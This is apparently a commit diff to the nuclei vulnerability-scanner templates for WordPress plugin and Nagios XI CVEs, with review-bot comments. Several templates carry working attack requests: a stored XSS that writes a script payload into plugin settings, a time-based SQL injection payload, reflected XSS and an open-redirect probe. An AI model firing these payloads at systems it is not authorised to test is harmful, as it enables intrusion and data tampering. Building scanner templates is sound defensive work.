+ - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1
+# digest: 4a0a00473045022100b07e30b60813be07ad6a2b28ad020bb7afc7e921992d672cc8cfd26e37ccddd502203e41c21853075160cd1331bf8021e9aa97b5a5a9987ea23114fc44e42121ed46:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
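Review bot: The template's only matcher is a regex on the `Location` header, so any response that happens to echo `interact.sh` in a `Location` value is reported as an open redirect regardless of status code. Pairing it with a status matcher under `matchers-condition: and` ties the finding to an actual redirect; the codes below are the usual WordPress redirect defaults, but the exact code passthru.php emits is not visible here and should be confirmed before narrowing the list.
```yaml
    matchers-condition: and
    matchers:
      - type: regex
        part: header
        # … unchanged: Location header regex for interact.sh …
      - type: status
        status:
          - 301
          - 302
```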
diff --git a/nuclei-templates/CVE-2021/CVE-2021-25075.yaml b/nuclei-templates/CVE-2021/CVE-2021-25075.yaml new file mode 100644 index 0000000000..c3af39b163 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-25075.yaml 
@@ -0,0 +1,53 @@
+id: CVE-2021-25075
+info:
+ name: WordPress Duplicate Page or Post < 1.5.1 - Stored XSS
+ author: DhiyaneshDK
+ severity: low
+ description: |
+ The plugin does not have any authorisation and has a flawed CSRF check in the wpdevart_duplicate_post_parametrs_save_in_db AJAX action, allowing any authenticated users, such as subscriber to call it and change the plugin's settings, or perform such attack via CSRF. Furthermore, due to the lack of escaping, this could lead to Stored Cross-Site Scripting issues.
+ remediation: Fixed in version 1.5.1.
+ reference:
+ - https://wpscan.com/vulnerability/db5a0431-af4d-45b7-be4e-36b6c90a601b
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25075
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N
+ cvss-score: 3.50
+ cve-id: CVE-2021-25075
+ cwe-id: CWE-862
+ tags: cve,cve2021,wordpress,xss,wp-plugin,authenticated
+requests:
+ - raw:
+ - |
+ POST /wp-login.php HTTP/1.1
+ Host: {{Hostname}}
+ Origin: {{RootURL}}
+ Content-Type: application/x-www-form-urlencoded
+ Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+ log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+ - |
+ POST /wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+ Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+ action=wpdevart_duplicate_post_parametrs_save_in_db&title_prefix=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28%2fXSS%2f%29+p
+ - |
+ GET /wp-admin/admin.php?page=wpda_duplicate_post_menu HTTP/1.1
+ Host: {{Hostname}}
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "style=animation-name:rotation onanimationstart=alert(/XSS/) p"
+ - "toplevel_page_wpda_duplicate_post_menu"
+ condition: and
+ - type: word
+ part: header
+ words:
+ - text/html
+ - type: status
+ status:
+ - 200
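Review bot: The second request carries two different actions — `action=wprss_fetch_items_row_action` in the query string and `action=wpdevart_duplicate_post_parametrs_save_in_db` in the body; admin-ajax.php reads the action from `$_REQUEST`, so which one wins depends on the server's `request_order`, and the query-string value looks like a leftover from an unrelated (WP RSS Aggregator) template. Change the request line to `POST /wp-admin/admin-ajax.php HTTP/1.1` so only the intended action is sent. A positive result also stores the `title_prefix` payload in the plugin's settings and the template never resets it, so `alert(/XSS/)` keeps firing in the target's admin page after the scan; add `intrusive` to the tags line and a description note telling operators to restore that option. Finally, this file uses the deprecated `requests:` key while the rest of this commit migrates templates to `http:`, so it should be converted for consistency.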
diff --git a/nuclei-templates/CVE-2021/CVE-2021-25078.yaml b/nuclei-templates/CVE-2021/CVE-2021-25078.yaml index 8bde118a09..40a84382ea 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-25078.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-25078.yaml @@ -6,18 +6,21 @@ info: severity: medium description: | The plugin does not validate, sanitise and escape the IP address of requests logged by the click tracking feature, allowing unauthenticated attackers to perform Cross-Site Scripting attacks against admin viewing the tracked requests. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of an authenticated user, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: Fixed in version 2.9.0 reference: - https://wpscan.com/vulnerability/d4edb5f2-aa1b-4e2d-abb4-76c46def6c6e - https://nvd.nist.gov/vuln/detail/CVE-2021-25078 - https://plugins.trac.wordpress.org/changeset/2648196 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-25078 cwe-id: CWE-79 epss-score: 0.00382 - epss-percentile: 0.70049 + epss-percentile: 0.72505 cpe: cpe:2.3:a:wpaffiliatemanager:affiliates_manager:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,7 +28,7 @@ info: vendor: wpaffiliatemanager product: affiliates_manager framework: wordpress - tags: cve,wp,wordpress,authenticated,cve2021,affiliates-manager,wp-plugin,xss,wpscan + tags: cve2021,cve,wp,wordpress,authenticated,affiliates-manager,wp-plugin,xss,wpscan,wpaffiliatemanager http: - raw: 
@@ -51,4 +54,4 @@ http: - 'contains(body_3, "")' - 'contains(body_3, "Affiliates Manager Click Tracking")' condition: and -# digest: 4a0a00473045022100ece5db96fd2febfa8b8fba4c5f665d554470ed3a478f1ce4cd9b032401eea3c9022005ebb652d9f7512cc7b5fb6590429fc8176f9693d50def2612082e18bbadd963:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d45c069f29a544929998b412cdaf7084396f20aae8cff0f93ca75a1b591460d202201e599ffe4698dda85884b6e16ba5a83ac94b79c1a3ef46490718bf36107cfa50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-25079.yaml b/nuclei-templates/CVE-2021/CVE-2021-25079.yaml index 12e7630d15..8966b0c494 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-25079.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-25079.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-25079 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.41034 + epss-percentile: 0.40882 cpe: cpe:2.3:a:crmperks:contact_form_entries:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -27,7 +27,7 @@ info: product: contact_form_entries framework: wordpress google-query: inurl:"/wp-content/plugins/contact-form-entries/" - tags: cve,cve2021,wordpress,wp-plugin,wpscan,authenticated,contact-form-entries,xss + tags: cve2021,cve,wordpress,wp-plugin,wpscan,authenticated,contact-form-entries,xss,crmperks http: - raw: @@ -48,4 +48,4 @@ http: - 'contains(header_2, "text/html")' - "contains(body_2, '') && contains(body_2, 'contact-form')" condition: and -# digest: 4b0a00483046022100df0e4967278ed82a569099007fe558e794f5c0f98dd778060b8aa6c535952d6a022100bca9f83d5233990ac20c32f5d853a6647ee380b4b7b8222bf07ab6d51817b486:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220527cd48e142fc92a896aa9a399aaec530758544a07344bf510df911351b0108c022051f1ca942de9836a377cb44c7a038c6f2b740ecceeb66faca7d10b4a7e7f7585:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/nuclei-templates/CVE-2021/CVE-2021-25085.yaml b/nuclei-templates/CVE-2021/CVE-2021-25085.yaml deleted file mode 100644 index 250ce81d36..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-25085.yaml +++ /dev/null @@ -1,42 +0,0 @@ -id: CVE-2021-25085 - -info: - name: WOOF WordPress plugin - Cross-Site Scripting - author: Maximus Decimus - severity: medium - description: | - The WOOF WordPress plugin does not sanitize or escape the woof_redraw_elements parameter before reflecting it back in an admin page, leading to a reflected cross-site scripting. - reference: - - https://wpscan.com/vulnerability/b7dd81c6-6af1-4976-b928-421ca69bfa90 - - https://plugins.trac.wordpress.org/changeset/2648751 - - https://nvd.nist.gov/vuln/detail/CVE-2021-25085 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-25085 - metadata: - verified: true - tags: cve,cve2021,wordpress,wp-plugin,wp,xss,wpscan - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-admin/admin-ajax.php?action=woof_draw_products&woof_redraw_elements[]=" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '"additional_fields":[""]}' - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - -# Enhanced by cs 06/21/2022 diff --git a/nuclei-templates/CVE-2021/CVE-2021-25099.yaml b/nuclei-templates/CVE-2021/CVE-2021-25099.yaml index 2dad95879c..9ad8526fe2 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-25099.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-25099.yaml 
@@ -6,20 +6,33 @@ info: severity: medium description: | WordPress GiveWP plugin before 2.17.3 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape the form_id parameter before returning it in the response of an unauthenticated request via the give_checkout_login AJAX action. An attacker can inject arbitrary script in the browser of a user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. + remediation: | + Update to the latest version of the GiveWP plugin (2.17.3 or higher) to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/87a64b27-23a3-40f5-a3d8-0650975fee6f - https://wordpress.org/plugins/give/ - https://nvd.nist.gov/vuln/detail/CVE-2021-25099 + - https://plugins.trac.wordpress.org/changeset/2659032 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-25099 cwe-id: CWE-79 + epss-score: 0.001 + epss-percentile: 0.40139 + cpe: cpe:2.3:a:givewp:givewp:*:*:*:*:*:wordpress:*:* metadata: - verified: "true" - tags: wp-plugin,wp,give,unauth,wordpress,cve2021,xss,wpscan,cve + verified: true + max-request: 1 + vendor: givewp + product: givewp + framework: wordpress + tags: cve2021,cve,xss,wp,give,wordpress,wp-plugin,unauth,wpscan,givewp -requests: +http: - raw: - | POST /wp-admin/admin-ajax.php HTTP/1.1 
@@ -36,5 +49,4 @@ requests: - 'contains(body, "")' - 'contains(body, "give_user_login")' condition: and - -# Enhanced by md on 2023/01/06 +# digest: 4a0a00473045022100b8b1bbb738779094f1c4803577aabec032f44d2bd14d740c5bc4dc129660ed1c0220446b58a14acbdfe6216958668bbfe39c82d48cc2aa45a2dd0645799000150e26:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-25104.yaml b/nuclei-templates/CVE-2021/CVE-2021-25104.yaml index 9b75cc8d44..ece0c65050 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-25104.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-25104.yaml 
@@ -5,21 +5,32 @@ info: author: Akincibor severity: medium description: WordPress Ocean Extra plugin before 1.9.5 contains a cross-site scripting vulnerability. The plugin does not escape generated links which are then used when the OceanWP theme is active. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. + remediation: Fixed in version 1.9.5. reference: - https://wpscan.com/vulnerability/2ee6f1d8-3803-42f6-9193-3dd8f416b558 - https://wordpress.org/plugins/ocean-extra/ - https://nvd.nist.gov/vuln/detail/CVE-2021-25104 - remediation: Fixed in version 1.9.5. + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-25104 cwe-id: CWE-79 + epss-score: 0.00106 + epss-percentile: 0.42122 + cpe: cpe:2.3:a:oceanwp:ocean_extra:*:*:*:*:*:wordpress:*:* metadata: - verified: "true" - tags: cve,cve2021,wordpress,xss,wp-plugin,authenticated,wpscan,wp,ocean-extra + verified: true + max-request: 2 + vendor: oceanwp + product: ocean_extra + framework: wordpress + tags: cve,cve2021,wordpress,xss,wp-plugin,authenticated,wpscan,wp,ocean-extra,oceanwp -requests: +http: - raw: - | POST /wp-login.php HTTP/1.1 @@ -29,12 +40,10 @@ requests: Cookie: wordpress_test_cookie=WP%20Cookie%20check log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - - | GET /wp-admin/?step=demo&page=owp_setup&a"> HTTP/1.1 Host: {{Hostname}} - cookie-reuse: true matchers-condition: and matchers: - type: word 
@@ -52,5 +61,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/09/28 +# digest: 4a0a00473045022100e3443b56e8a05c597dc43a2aa8eb67debf30c8d4ae911a0a37658bb837881d2702200e78e6b22e247af5d76f5db33eb488b26dac3e21e943f38a4d4baa45bceb3afd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-25111.yaml b/nuclei-templates/CVE-2021/CVE-2021-25111.yaml new file mode 100644 index 0000000000..01f582930c --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-25111.yaml 
@@ -0,0 +1,41 @@
+id: CVE-2021-25111
+
+info:
+ name: WordPress English Admin <1.5.2 - Open Redirect
+ author: akincibor
+ severity: medium
+ description: WordPress English Admin plugin before 1.5.2 contains an open redirect vulnerability. The plugin does not validate the admin_custom_language_return_url before redirecting users to it. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
+ impact: |
+ An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the execution of other malicious activities.
+ remediation: |
+ Update to the latest version of the WordPress English Admin plugin (1.5.2 or higher) to fix the open redirect vulnerability.
+ reference:
+ - https://wpscan.com/vulnerability/af548fab-96c2-4129-b609-e24aad0b1fc4
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-25111
+ - https://github.com/ARPSyndicate/kenzer-templates
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2021-25111
+ cwe-id: CWE-601
+ epss-score: 0.00106
+ epss-percentile: 0.42122
+ cpe: cpe:2.3:a:english_wordpress_admin_project:english_wordpress_admin:*:*:*:*:*:wordpress:*:*
+ metadata:
+ max-request: 1
+ vendor: english_wordpress_admin_project
+ product: english_wordpress_admin
+ framework: wordpress
+ tags: cve2021,cve,unauth,wpscan,wp-plugin,redirect,wordpress,wp,english_wordpress_admin_project
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-admin/admin-ajax.php?action=heartbeat&admin_custom_language_toggle=1&admin_custom_language_return_url=https://interact.sh"
+
+ matchers:
+ - type: regex
+ part: header
+ regex:
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1
+# digest:
4a0a00473045022100b6913aba1c72c55da8551e0917a22c516741c18717ffea0c7280d1adb54b6f7b0220752ca9e7e8ffc2c6f70da248526c72f2fa6401f0551c65ff1fc058405dc487c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-25112.yaml b/nuclei-templates/CVE-2021/CVE-2021-25112.yaml deleted file mode 100644 index ead789b908..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-25112.yaml +++ /dev/null @@ -1,49 +0,0 @@ -id: CVE-2021-25112 - -info: - name: WHMCS Bridge < 6.4b - Authenticated Reflected XSS - author: DhiyaneshDK - severity: medium - description: | - The plugin does not sanitise and escape the error parameter before outputting it back in admin dashboard, leading to a Reflected Cross-Site Scripting - reference: - - https://wpscan.com/vulnerability/4aae2dd9-8d51-4633-91bc-ddb53ca3471c - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25112 - tags: cve,cve2021,wordpress,xss,wp-plugin,authenticated - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2021-25112 - cwe-id: CWE-79 - -requests: - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Origin: {{RootURL}} - Content-Type: application/x-www-form-urlencoded - Cookie: wordpress_test_cookie=WP%20Cookie%20check - - log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - - - | - GET /wp-admin/options-general.php?page=cc-ce-bridge-cp&error=%3Cimg%20src%20onerror=alert(document.domain)%3E HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - "" - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2021/CVE-2021-25114.yaml b/nuclei-templates/CVE-2021/CVE-2021-25114.yaml index b1513872af..6b5942531e 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-25114.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-25114.yaml 
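Review bot: The description's closing sentence — `An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations` — overstates a CWE-601 open redirect whose own CVSS vector in this hunk is C:L/I:L/A:N; the realistic outcome is the one the `impact` block already gives (sending a victim who follows a crafted link to an attacker-chosen site). Replace it with `An attacker can redirect users who follow a crafted link to an arbitrary external site, which mainly enables phishing.` so the description and impact agree. Separately, the single regex matcher fires on any response whose `Location` header mentions interact.sh; combining it with a 3xx status matcher under `matchers-condition: and` would tie the finding to an actual redirect, though the exact status the plugin returns is not visible here.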
@@ -1,32 +1,44 @@ id: CVE-2021-25114 info: - name: Paid Memberships Pro < 2.6.7 - Unauthenticated Blind SQL Injection + name: WordPress Paid Memberships Pro <2.6.7 - Blind SQL Injection author: theamanrawat severity: critical description: | - The plugin does not escape the discount_code in one of its REST route (available to unauthenticated users) before using it in a SQL statement, leading to a SQL injection. + WordPress Paid Memberships Pro plugin before 2.6.7 is susceptible to blind SQL injection. The plugin does not escape the discount_code in one of its REST routes before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database. + remediation: | + Upgrade to WordPress Paid Memberships Pro version 2.6.7 or later to mitigate this vulnerability. 
reference: - https://wpscan.com/vulnerability/6c25a5f0-a137-4ea5-9422-8ae393d7b76b - https://wordpress.org/plugins/paid-memberships-pro/ - https://nvd.nist.gov/vuln/detail/CVE-2021-25114 + - https://www.paidmembershipspro.com/pmpro-update-2-6-7-security-release/ + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-25114 cwe-id: CWE-89 + epss-score: 0.0412 + epss-percentile: 0.91962 + cpe: cpe:2.3:a:strangerstudios:paid_memberships_pro:*:*:*:*:*:wordpress:*:* metadata: + verified: true + max-request: 2 + vendor: strangerstudios + product: paid_memberships_pro + framework: wordpress google-query: inurl:"/wp-content/plugins/paid-memberships-pro" - verified: "true" - tags: wp-plugin,wp,sqli,paid-memberships-pro,wpscan,cve,cve2021,wordpress + tags: cve2021,cve,wp-plugin,wp,sqli,paid-memberships-pro,wpscan,wordpress,strangerstudios -requests: +http: - raw: - | @timeout: 15s GET /?rest_route=/pmpro/v1/checkout_level&level_id=3&discount_code=%27%20%20union%20select%20sleep(6)%20--%20g HTTP/1.1 Host: {{Hostname}} - - | GET /wp-content/plugins/paid-memberships-pro/js/pmpro-checkout.js HTTP/1.1 Host: {{Hostname}} @@ -35,7 +47,8 @@ requests: - type: dsl dsl: - duration_1>=6 - - contains(all_headers_1, "application/json") + - contains(header_1, "application/json") - status_code == 200 - contains(body_2, 'other_discount_code_') condition: and +# digest: 490a0046304402205779f4688b602f810729763c28227697e17fbe54eabdf2769e00c3efd62634dc0220099aece2ea83884ee11dd109d206c253835129f29b3ea2922f55c13bbcce1686:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-25118.yaml b/nuclei-templates/CVE-2021/CVE-2021-25118.yaml deleted file mode 100644 index b82074a3bf..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-25118.yaml +++ /dev/null 
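Review bot: The rewritten `description` drops the "(available to unauthenticated users)" qualifier and the new `name` drops "Unauthenticated", yet the unchanged CVSS vector still says `PR:N` and the new `tags` line carries no `unauth` tag, so the template no longer states anywhere that the REST route needs no login. Suggest restoring it, e.g. `The plugin does not escape the discount_code in one of its unauthenticated REST routes before using it in a SQL statement.`, and adding `unauth` to `tags` so the template is triaged like the other unauthenticated SQLi checks in this commit. The `all_headers_1` to `header_1` change in the second hunk and the `max-request: 2` value are consistent with the two raw requests.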
@@ -1,45 +0,0 @@ -id: CVE-2021-25118 - -info: - name: Yoast SEO < 17.3 - Path Disclosure - author: DhiyaneshDK - severity: medium - description: The plugin discloses the full internal path of featured images in posts via the wp/v2/posts REST endpoints which could help an attacker identify other vulnerabilities or help during the exploitation of other identified vulnerabilities. - reference: - - https://wpscan.com/vulnerability/2c3f9038-632d-40ef-a099-6ea202efb550 - - https://nvd.nist.gov/vuln/detail/CVE-2021-25118 - - https://plugins.trac.wordpress.org/changeset/2608691 - remediation: Fixed in version 17.3 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cve-id: CVE-2021-25118 - cwe-id: CWE-200 - tags: wpscan,wordpress,cve2021,wp-plugin,fpd,cve,wp - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-json/wp/v2/posts?per_page=1" - - matchers-condition: and - matchers: - - type: regex - regex: - - '"path":"(.*)/wp-content\\(.*)","size' - - - type: word - part: header - words: - - "application/json" - - - type: status - status: - - 200 - - extractors: - - type: regex - part: body - group: 1 - regex: - - '"path":"(.*)/wp-content\\(.*)","size' diff --git a/nuclei-templates/CVE-2021/CVE-2021-25120.yaml b/nuclei-templates/CVE-2021/CVE-2021-25120.yaml deleted file mode 100644 index 28aa3f7856..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-25120.yaml +++ /dev/null 
@@ -1,50 +0,0 @@ -id: CVE-2021-25120 - -info: - name: Easy Social Feed < 6.2.7 - Cross-Site Scripting - author: dhiyaneshDk - severity: medium - description: Easy Social Feed < 6.2.7 is susceptible to reflected cross-site scripting because the plugin does not sanitize and escape a parameter before outputting it back in an admin dashboard page, leading to it being executed in the context of a logged admin or editor. - reference: - - https://wpscan.com/vulnerability/6dd00198-ef9b-4913-9494-e08a95e7f9a0 - - https://wpscan.com/vulnerability/0ad020b5-0d16-4521-8ea7-39cd206ab9f6 - - https://nvd.nist.gov/vuln/detail/CVE-2021-25120 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-25120 - cwe-id: CWE-79 - tags: cve,cve2021,wordpress,wp-plugin,xss,authenticated,wpscan - -requests: - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Origin: {{RootURL}} - Content-Type: application/x-www-form-urlencoded - Cookie: wordpress_test_cookie=WP%20Cookie%20check - - log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - - | - GET /wp-admin/admin.php?page=easy-facebook-likebox&access_token=a&type= HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - "'type' : ''" - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/04/21 diff --git a/nuclei-templates/CVE-2021/CVE-2021-25296.yaml b/nuclei-templates/CVE-2021/CVE-2021-25296.yaml index 602b2fab4f..bcf503b7ff 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-25296.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-25296.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | Nagios XI 5.5.6 through 5.7.5 is susceptible to authenticated remote command injection. There is improper sanitization of authenticated user-controlled input by a single HTTP request via the file /usr/local/nagiosxi/html/includes/configwizards/windowswmi/windowswmi.inc.php. This in turn can lead to remote code execution, by which an attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability allows authenticated attackers to execute arbitrary commands on the target system. remediation: | Upgrade Nagios XI to a patched version or apply the vendor-supplied patch to mitigate this vulnerability. reference: @@ -19,8 +21,8 @@ info: cvss-score: 8.8 cve-id: CVE-2021-25296 cwe-id: CWE-78 - epss-score: 0.89404 - epss-percentile: 0.98455 + epss-score: 0.89514 + epss-percentile: 0.98511 cpe: cpe:2.3:a:nagios:nagios_xi:5.7.5:*:*:*:*:*:*:* metadata: verified: true @@ -28,7 +30,7 @@ info: vendor: nagios product: nagios_xi shodan-query: title:"Nagios XI" - tags: packetstorm,rce,oast,authenticated,msf,cve,cve2021,nagiosxi,kev + tags: cve,cve2021,packetstorm,rce,oast,authenticated,msf,nagiosxi,kev,nagios http: - raw: @@ -83,4 +85,4 @@ http: - "var nsp_str = ['\"](.*)['\"];" internal: true part: body -# digest: 490a004630440220032f4e19e282ef6d684f1341055f3e4ca1b5e2e3c640f2c38b76fec6c6e2588b02203b49dcb0efa7bb798c4b75003af58f8efc4998a98d7bc62fae6ffa0058763b96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206666d4036d4d35dab96e894b38ad9c5edf03bd115f6e5d9e2b93663420df328c0220408cb9f27506a076cc138fa9720eb3f0fc641f9eb0b01d3742742c5bc0c07c90:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
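Review bot: The new `impact` line correctly states that the command injection needs an authenticated user, but the unchanged `description` context line directly above it still ends with "without entering necessary credentials", which contradicts both the `impact` text and the `authenticated` tag in the third hunk. Suggest trimming the description's final clause to `...and/or gain full control over a compromised system.` The same contradiction exists in the CVE-2021-25297 and CVE-2021-25298 hunks below, which carry the same description wording and the same new `impact` line.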
diff --git a/nuclei-templates/CVE-2021/CVE-2021-25297.yaml b/nuclei-templates/CVE-2021/CVE-2021-25297.yaml index b09ed2d6ef..389f33f82b 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-25297.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-25297.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Nagios XI 5.5.6 through 5.7.5 is susceptible to authenticated remote command injection. There is improper sanitization of authenticated user-controlled input by a single HTTP request via the file /usr/local/nagiosxi/html/includes/configwizards/switch/switch.inc.php. This in turn can lead to remote code execution, by which an attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability allows an authenticated attacker to execute arbitrary commands on the target system. remediation: | Upgrade Nagios to a version higher than 5.7.5 or apply the provided patch to mitigate the vulnerability. reference: @@ -19,8 +21,8 @@ info: cvss-score: 8.8 cve-id: CVE-2021-25297 cwe-id: CWE-78 - epss-score: 0.89404 - epss-percentile: 0.98455 + epss-score: 0.90211 + epss-percentile: 0.98732 cpe: cpe:2.3:a:nagios:nagios_xi:5.7.5:*:*:*:*:*:*:* metadata: verified: true @@ -28,7 +30,7 @@ info: vendor: nagios product: nagios_xi shodan-query: title:"Nagios XI" - tags: packetstorm,rce,oast,authenticated,msf,cve,cve2021,nagiosxi,kev + tags: cve2021,cve,packetstorm,rce,oast,authenticated,msf,nagiosxi,kev,nagios http: - raw: 
@@ -83,4 +85,4 @@ http: - "var nsp_str = ['\"](.*)['\"];" internal: true part: body -# digest: 4a0a0047304502203dbef0c11547f2fe56b11418c84fc2b7c0b75eed8f549500e54d7f06afc5828f022100d7bbc1213ad729e2820bf9d535b22a3a053449022612bd1297bdc47b09074b7a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022002c535c416c93bf3230b4b497297c11d4d1ee31297754e601903ba6730dfdae1022100a8503c90b036840ad6480ea87590c5fde3b4b3d809100390be430825d84803e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-25298.yaml b/nuclei-templates/CVE-2021/CVE-2021-25298.yaml index 3dfe5e05cb..214437d510 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-25298.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-25298.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Nagios XI 5.5.6 through 5.7.5 is susceptible to authenticated remote command injection. There is improper sanitization of authenticated user-controlled input by a single HTTP request via the file /usr/local/nagiosxi/html/includes/configwizards/cloud-vm/cloud-vm.inc.php. This in turn can lead to remote code execution, by which an attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability allows an authenticated attacker to execute arbitrary commands on the target system. remediation: | Upgrade Nagios XI to a patched version or apply the vendor-supplied patch to mitigate this 